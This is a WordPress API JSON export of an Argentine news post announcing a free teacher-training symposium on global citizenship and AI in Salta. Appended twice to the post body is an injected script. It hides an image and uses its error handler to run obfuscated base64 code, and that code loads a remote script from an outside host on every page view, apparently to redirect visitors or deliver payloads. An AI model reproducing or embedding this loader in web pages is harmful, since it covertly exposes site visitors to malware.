{"id":4205,"date":"2024-07-19T10:59:18","date_gmt":"2024-07-19T13:59:18","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4205"},"modified":"2025-08-13T23:52:38","modified_gmt":"2025-08-14T02:52:38","slug":"capacitacion-docente-en-ciudadania-global-e-inteligencia-artificial-presente-y-futuro-de-la-educacion-y-el-trabajo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4205","title":{"rendered":"Capacitaci\u00f3n docente en Ciudadan\u00eda global e Inteligencia artificial: presente y futuro de la educaci\u00f3n y el trabajo"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-17856eb59424c4997006df1dfc6c213f\" style=\"background-color:#4c4c4d\"><em>La formaci\u00f3n tendr\u00e1 lugar el 31 de agosto en la sede de UTHGRA, Mitre 966, Salta. El evento es gratuito y cuenta con puntaje docente.<\/em><\/h3>\n\n\n\n<p>Los ministerios&nbsp;de Educaci\u00f3n, Cultura, Ciencia y Tecnolog\u00eda&nbsp;y el de Econom\u00eda&nbsp;y Servicios P\u00fablicos&nbsp;impulsan este Simposio de Educaci\u00f3n Global 2024, que es organizado por AFS (American Field Service) y est\u00e1 destinado a representantes de&nbsp;ministerios de Educaci\u00f3n y organismos de gobierno; directores de instituciones educativas de gesti\u00f3n p\u00fablica y privada,&nbsp;docentes,&nbsp;directores de Recursos Humanos,&nbsp;diplom\u00e1ticos,&nbsp;personas interesadas en la tem\u00e1tica&nbsp;y&nbsp;voluntarios de organizaciones.<\/p>\n\n\n\n<p>En un mundo cada vez m\u00e1s polarizado donde el racismo, la intolerancia y el odio al diferente crece d\u00eda a d\u00eda, es un imperativo educar a los ciudadanos del futuro para que cambien esta trayectoria y se conviertan en ciudadanos globales que comprenden la interdependencia del mundo y celebren la diversidad que los rodea.<\/p>\n\n\n\n<p>El simposio navegar\u00e1 por los siguientes temas: La urgencia e importancia en educar en competencias globales. Los desaf\u00edos que enfrentan las instituciones de educaci\u00f3n en la promoci\u00f3n de la ciudadan\u00eda global. Competencias globales frente al resurgimiento de los nacionalismos. Competencias globales, valores y fortalecimiento de la democracia. El aula como \u00e1mbito ideal de desarrollo de empat\u00eda y competencias globales. Competencias globales en la curr\u00edcula de formaci\u00f3n docente y en la formaci\u00f3n de alumnos. Ciudadan\u00eda digital e inteligencia artificial: presente y futuro de la educaci\u00f3n y el trabajo. Estrategia y conceptos principales que deben ser inclu\u00eddos en un plan de estudios de Ciudadan\u00eda Global. Impacto de las experiencias de educaci\u00f3n internacional a la hora de la formaci\u00f3n y desarrollo de ciudadanos globales en el contexto actual. Oportunidades y buenas pr\u00e1cticas en la internacionalizaci\u00f3n de la educaci\u00f3n.<\/p>\n\n\n\n<p>Para inscripciones y m\u00e1s informaci\u00f3n:&nbsp;<a href=\"https:\/\/afs.org.ar\/simposioargentina2024\/\">https:\/\/afs.org.ar\/simposioargentina2024\/<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La formaci\u00f3n tendr\u00e1 lugar el 31 de agosto en la sede de UTHGRA, Mitre 966, Salta. El evento es gratuito y cuenta con puntaje docente. Los ministerios&nbsp;de Educaci\u00f3n, Cultura, Ciencia y Tecnolog\u00eda&nbsp;y el de Econom\u00eda&nbsp;y Servicios P\u00fablicos&nbsp;impulsan este Simposio de Educaci\u00f3n Global 2024, que es organizado por AFS (American Field Service) y est\u00e1 destinado a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4206,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11,17],"tags":[],"class_list":{"0":"post-4205","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4205"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4205"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4205\/revisions"}],"predecessor-version":[{"id":6739,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4205\/revisions\/6739"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4206"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4205"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4205"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4205"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}